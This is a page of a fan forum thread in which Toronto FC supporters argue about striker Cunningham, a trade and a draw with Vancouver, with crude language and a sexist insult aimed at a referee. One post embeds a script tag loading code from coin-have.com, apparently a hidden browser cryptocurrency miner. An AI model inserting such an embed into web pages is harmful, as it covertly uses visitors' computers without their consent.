Page 36 of 36 FirstFirst ... 263233343536
Results 1,051 to 1,079 of 1079
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Give it your all on July 22nd or bust! Go big or go home!

Esky for Cunny ... Worst trade EVER! Too bad only time was and consistently failed oportunities was what told us the truth.

On the open market? Allocation money? Can we get Esky back now from Chivas? lol Maybe a bag of socce balls? Hopefully the greater fool gives us a decent player.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Cunningham had a pretty good game and I come on this forum and everyone is saying he can't finish he played like shit, bla bla bla. What game were you people watching?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Torcida_Toronto View Post
    Cunningham had a pretty good game and I come on this forum and everyone is saying he can't finish he played like shit, bla bla bla. What game were you people watching?

we were watching the game where he did nothing and missed another break away lol

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Benficachop20 View Post
    we were watching the game where he did nothing and missed another break away lol
    I feel like making a compilation. I shut people with my Robert comp, Cunny made some great passes, had a great chip over the GK (ok it was offside) and ran his ass off. His game has improved heaps in the last few weeks but noone seems to be noticing because he doesn't have his 100th goal.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

1 on 1 with keeper and he flaked....and for christs sake...get your hands off your hips!!!!
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Have to say, I agree... Cunny had a good match today. It's about time

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Cunningham is the worst fucking player on the planet. Steven Hawking could have scored that 1 on 1 break.

Julius James, he has 2 names. Julius James, he is to blame. Fuckin guy.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Cunny made some great passes, had a great chip over the GK (ok it was offside) and ran his ass off. His game has improved heaps in the last few weeks but noone seems to be noticing because he doesn't have his 100th goal.
    He stinks !!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Mojo View Post
    Cunningham is the worst fucking player on the planet. Steven Hawking could have scored that 1 on 1 break.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I feel like making a compilation. I shut people with my Robert comp, Cunny made some great passes, had a great chip over the GK (ok it was offside) and ran his ass off. His game has improved heaps in the last few weeks but noone seems to be noticing because he doesn't have his 100th goal.
    dude you are blind.... he had to clear break away which shuld ahve been to goals... on the first one he choked on the second one he just fell down looking for a pk... this n hapens too often... he goes down in the box on any contact.... at this point i wish we had samuel still with us... atleast he would fight a ball to death. how many times he got a hold of balls that seemed in posible and in possesion.

And Robert... I am not saying his perfecct and he does get lazy but i think he has moments of brilliance in the match that makes up for it. but cunny upfront is a much bigger problem than robert.
    But yea robert is just that style of player he has a great shot, very good long pass and not bad dribling skill he;s hustleing isn;t the greatest and he gets lazy. But you have to accept that... it;s like asking Insaghi to be a play maker or ask beckham to throw more takles...

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

cunningham played terrible but thats not even what bothers me.. what bothers me is the fact that he puts no effort in at all and spends half the game lieing on the ground whining and complaining.. sure he made a few good passes.. but when dichio is in there we complaing about all he can do is hold up the ball and distribute it.. at least he can finish ONCE in a while.. if dichio hand cunninghams speed...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Not sure if it's been posted but highlights available at...

http://www.cbc.ca/sports/

Go to the on demand section and along the bottom is the media player link.

RPB Member

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Gotta see the replay but I saw the couver keeper grab at Cunny's ankle before he flopped. Granted a child wouldn't be floored by the swipe but I would say it warrants a call...

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^Definately a penalty and red card. If that stupid bitch wasn't too busy looking at Robert's ass all day maybe she would have seen it. She also missed the handball that should have been a penalty against us, so I guess it evened out...

RPB Member

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Agreed on the handball but the Cunny no-call was pretty obvious. I'll give her cred for standing up early in the first half keeping the players in check, though. We'll see her again.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Julius James, he has 2 names. Julius James, he is to blame. Fuckin guy.
    lol whaaaA?

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Good to see that we're still in the competition. Now to a win against Montreal!!!
    MLS is a tough, physical league, that emphasizes speed, and features plastic fields, grueling travel, extreme weather, and incompetent refs. - NK Toronto

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Daveisonfire View Post
    lol whaaaA?
    Maybe I'm pulling a Nigel, but isnt he the one that missed the header for the Whitecaps to score their 2nd goal?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Maybe I'm pulling a Nigel, but isnt he the one that missed the header for the Whitecaps to score their 2nd goal?
    ROFLMAO .... was Edu

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Anyone hear the announcer mention during the game that the Limp Act losing to Puerto Rico was a hiccup? I seem to have forgotten how awesome the Limp Act have been this season what with their inability to win league games or score goals at home.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Although I think TFC played better than the ShiteCaps, TFC was lucky to tie this game....I can't believe that Robinson wasn't called on that hand ball...it was pretty blatant!

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by DGVilleneuve View Post
    Give it your all on July 22nd or bust! Go big or go home!

Esky for Cunny ... Worst trade EVER! Too bad only time was and consistently failed oportunities was what told us the truth.

On the open market? Allocation money? Can we get Esky back now from Chivas? lol Maybe a bag of socce balls? Hopefully the greater fool gives us a decent player.
    Esky is injured and has only played for Chivas for 13 minutes this season. You really think a player in the medical ward is better than one on the pitch? Seriously, do some research before you claim something like this.

http://chivas.usa.mlsnet.com/players...atType=current
    MLS is a tough, physical league, that emphasizes speed, and features plastic fields, grueling travel, extreme weather, and incompetent refs. - NK Toronto

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This is a joke right? Keep the thread going kinda thing?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Oldtimer View Post
    Esky is injured and has only played for Chivas for 13 minutes this season. You really think a player in the medical ward is better than one on the pitch? Seriously, do some research before you claim something like this.

http://chivas.usa.mlsnet.com/players...atType=current
    "Can we get Esky back now from Chivas? lol"

Note the LOL dude ... I was joking about getting Esky back. I doubt this will ever happen, but we got shafted on the trade. We had big hopes for Cunningham when he came to the team ... He went from scoring on average a goal every 2 games (16/31 or 51.61%) at RSL to 3 goals in 16 games (18.75%) played last year and 3 goals in 13 games (23.08%) played this year. What happened?

Walks around with his hands on his hips or flops around trying to draw cards. Enough is Enough ... Get SOMETHING for him.

Right now - I'd rather have anything that would put us in a better position to get someone that can deliver rather than a guy past his prime acting the way Cunny has over the last few games and most importantly not delivering what he's paid to deliver!

On an Esky side note:
    "I can't tell you how frustrated I am, especially since I worked so hard in the offseason. I lost 10 pounds, got in the best shape I've ever been in and really felt coming in that I was going to have an impact," Eskandarian said. "To get this freak injury thing we can't seem to figure out has been super frustrating because I've been watching the games and I know I can't help the team out." A right groin strain has kept Eskandarian from playing more than just 13 minutes during the 2008 MLS season. In his limited time, Eskandarian showed his worth to his new club as he buried a late goal in a 3-1 win against Real Salt Lake on April 5.
    http://chivas.usa.mlsnet.com/news/te....jsp&team=t120

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Compilations can make anyone look good. As far as Cunny goes you are spot on, he is offside, he runs but has no clue what is going on and yes he hasn't scored because he is garbage. Is he not a striker, score for fuck sakes. Get rid of this guy $230,00 for what. At least Lombardo only cost $30,000 and he can do the same thing.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by DigzTFC! View Post
    I know I would ruffle feathers with this and he does what is asked. But I don't see him taking over games since his first couple with TFC. He should be a dominant player, but he has few good plays a game and thats all. Maybe its systemic

I agree that he is TFC best player. And for being our best player he hasn't shown to be very dominant.
    If it wasn't for him we would be battling the Earthquakes for last place. He seems to be the only one who shows up every game. Without a doubt he is the most talented player on the team. Robert is here for a payday only, he could care less and it's getting very obvious every game. Edu is overrated, Robbo what's up with him. These 2 are supposed to be holding our midfield together what a disaster. We can't score, we can't defend, we can't pass the ball this might get ugly in a hurry. As for the Impact game there going to defend obviously and I don't know if we are good enough to break them down.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by RPB73 View Post
    If it wasn't for him we would be battling the Earthquakes for last place. He seems to be the only one who shows up every game. Without a doubt he is the most talented player on the team. Robert is here for a payday only, he could care less and it's getting very obvious every game. Edu is overrated, Robbo what's up with him. These 2 are supposed to be holding our midfield together what a disaster. We can't score, we can't defend, we can't pass the ball this might get ugly in a hurry. As for the Impact game there going to defend obviously and I don't know if we are good enough to break them down.
    WE ARE GOING TO FUCK THE IMPACT UP! DON'T YOU WORRY!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by RPB73 View Post
    No surprises there. Typical away game performance.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Corcai View Post
    We will all have a laugh about this when we are through 2 weeks from now.

Fucking frustrating, but our boys will have no trouble winning against MTL.
    How can you say this. Have you been watching the boys play lately. There are concerns all over the pitch. They can't finish, there have been problems in the back 4(sit Wynne for a game). The midfield keeps giving up possesion of the ball. They look like they are not focused at all. Their confidence level is declining. This is going to be a tough game. But on the brighter side this is really the first big game in the clubs history, it should be a night to remember.

COME ON YOU REDS!